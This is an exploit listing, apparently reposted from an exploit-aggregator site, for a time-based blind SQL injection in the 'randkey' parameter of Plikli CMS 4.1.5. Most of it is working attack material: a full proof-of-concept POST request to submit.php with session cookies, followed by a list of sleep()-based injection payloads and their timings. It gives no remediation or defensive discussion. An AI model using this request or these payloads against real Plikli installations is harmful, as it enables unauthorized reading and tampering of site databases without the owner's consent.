Share
## https://sploitus.com/exploit?id=PACKETSTORM:189610
# Exploit Title: Plikli CMS 4.1.5 - 'randkey' SQL Injection
    # Discovered by: Ahmet รœmit BAYRAM
    # Discovered Date: 05.03.2024
    # Vendor Homepage: https://github.com/kkumar326/plikli
    # Software Link:
    https://github.com/kkumar326/plikli/archive/refs/heads/master.zip
    # Demo: https://softaculous.com/demos/plikli_cms
    # Tested Version: v4.1.5 (latest)
    # Tested on: MacOS
    
    ### PoC Request ###
    
    POST /pliklicms/submit.php HTTP/1.1
    Host: localhost
    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:124.0) Gecko/
    20100101 Firefox/124.0
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/
    avif,image/webp,*/*;q=0.8
    Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3
    Accept-Encoding: gzip, deflate, br
    Content-Type: application/x-www-form-urlencoded
    Content-Length: 95
    Origin: http://localhost
    Connection: close
    Referer: http://localhost/pliklicms/submit.php
    Cookie: PHPSESSID=7f592f5d5ac82747bb6e682ca456a007; mnm_user=admin; mnm_key=
    YWRtaW46MjJrTkdHVDVLbG9NWToxZjMxOGY0YTk5OTQwMzkyYjZhOTJlNjI4MWUyZmRiZg%3D%3D;
    mnm_data=11fe3441ad4723841afd0beace6794ff
    Upgrade-Insecure-Requests: 1
    
    url=http%3A%2F%2Fgoogle.com&phase=1&randkey=1426389526396&id=c_1
    
    ### Vulnerable Parameter ###
    
    randkey
    
    ### Payloads ###
    
    1426389526396*if(now()=sysdate(),sleep(15),0) => 15.581
    1426389526396*if(now()=sysdate(),sleep(6),0) => 6.527
    1426389526396*if(now()=sysdate(),sleep(0),0) => 0.496
    1426389526396*if(now()=sysdate(),sleep(15),0) => 15.488
    1426389526396*if(now()=sysdate(),sleep(3),0) => 5.152
    1426389526396*if(now()=sysdate(),sleep(0),0) => 0.661
    1426389526396*if(now()=sysdate(),sleep(6),0) => 6.851